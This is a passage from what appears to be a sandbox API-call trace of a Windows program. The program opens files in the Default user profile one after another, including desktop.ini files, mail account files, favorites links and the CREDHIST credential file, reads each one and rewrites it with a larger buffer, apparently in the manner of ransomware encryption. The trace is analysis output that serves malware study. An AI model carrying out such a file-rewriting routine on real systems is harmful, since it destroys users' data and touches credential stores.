lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0178.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft at Work~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fc3c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft at Work~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0178.476] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.478] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0178.478] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.479] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0178.479] WriteFile (in: hFile=0x1d8, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.480] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0178.480] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0178.480] CloseHandle (hObject=0x1d8) returned 1 [0178.480] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.482] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.483] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x43 [0178.483] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.483] ReleaseMutex (hMutex=0x168) returned 1 [0178.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0178.483] ReadFile (in: hFile=0x1d8, lpBuffer=0x1fc2188, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc2188*, lpNumberOfBytesRead=0x359f2bc*=0x43, lpOverlapped=0x0) returned 1 [0178.484] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.485] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0178.485] CloseHandle (hObject=0x1d8) returned 1 [0178.485] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.486] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.486] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x311 [0178.486] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.486] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.486] ReleaseMutex (hMutex=0x168) returned 1 [0178.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0178.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="06_Pictures_rated_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0178.486] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x359f2bc*=0x311, lpOverlapped=0x0) returned 1 [0178.489] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.489] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x899, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x899, lpOverlapped=0x0) returned 1 [0178.489] CloseHandle (hObject=0x1d8) returned 1 [0178.489] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.490] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.490] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2a0 [0178.490] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.490] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.490] ReleaseMutex (hMutex=0x168) returned 1 [0178.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0178.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96bf4, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0178.490] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a59a8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a59a8*, lpNumberOfBytesRead=0x359f2bc*=0x2a0, lpOverlapped=0x0) returned 1 [0178.492] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.492] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x828, lpOverlapped=0x0) returned 1 [0178.493] CloseHandle (hObject=0x1d8) returned 1 [0178.493] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.494] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.494] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x285 [0178.494] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.494] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.494] ReleaseMutex (hMutex=0x168) returned 1 [0178.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0178.495] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a96f8, nNumberOfBytesToRead=0x285, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96f8*, lpNumberOfBytesRead=0x359f2bc*=0x285, lpOverlapped=0x0) returned 1 [0178.496] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.496] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x80d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x80d, lpOverlapped=0x0) returned 1 [0178.496] CloseHandle (hObject=0x1d8) returned 1 [0178.496] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe8 [0178.497] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.497] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.497] ReleaseMutex (hMutex=0x168) returned 1 [0178.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Soft Blue.htm", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Soft Blue.htm", lpUsedDefaultChar=0x0) returned 13 [0178.498] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea4da8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4da8*, lpNumberOfBytesRead=0x359f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0178.499] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.499] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x670, lpOverlapped=0x0) returned 1 [0178.500] CloseHandle (hObject=0x1d8) returned 1 [0178.500] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.501] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.501] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18 [0178.501] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.501] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.501] ReleaseMutex (hMutex=0x168) returned 1 [0178.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CREDHIST", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0178.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CREDHIST", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CREDHIST", lpUsedDefaultChar=0x0) returned 8 [0178.501] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x359f2bc*=0x18, lpOverlapped=0x0) returned 1 [0178.503] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.503] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a0, lpOverlapped=0x0) returned 1 [0178.503] CloseHandle (hObject=0x1d8) returned 1 [0178.504] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x192 [0178.504] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.504] ReleaseMutex (hMutex=0x168) returned 1 [0178.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0178.504] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x192, lpOverlapped=0x0) returned 1 [0178.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.506] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x71a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x71a, lpOverlapped=0x0) returned 1 [0178.506] CloseHandle (hObject=0x1d8) returned 1 [0178.506] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.506] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.507] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x85 [0178.507] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.507] ReleaseMutex (hMutex=0x168) returned 1 [0178.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0178.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Autos.url", lpUsedDefaultChar=0x0) returned 13 [0178.507] ReadFile (in: hFile=0x1d8, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x359f2bc*=0x85, lpOverlapped=0x0) returned 1 [0178.508] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.508] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0178.508] CloseHandle (hObject=0x1d8) returned 1 [0178.509] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x85 [0178.509] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.509] ReleaseMutex (hMutex=0x168) returned 1 [0178.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Mail.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0178.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Mail.url", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Mail.url", lpUsedDefaultChar=0x0) returned 21 [0178.510] ReadFile (in: hFile=0x1d8, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x359f2bc*=0x85, lpOverlapped=0x0) returned 1 [0178.511] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.511] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0178.511] CloseHandle (hObject=0x1d8) returned 1 [0178.511] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1f8 [0178.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.512] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.512] ReleaseMutex (hMutex=0x168) returned 1 [0178.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0178.512] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x359f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0178.513] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0178.513] WriteFile (in: hFile=0x1d8, 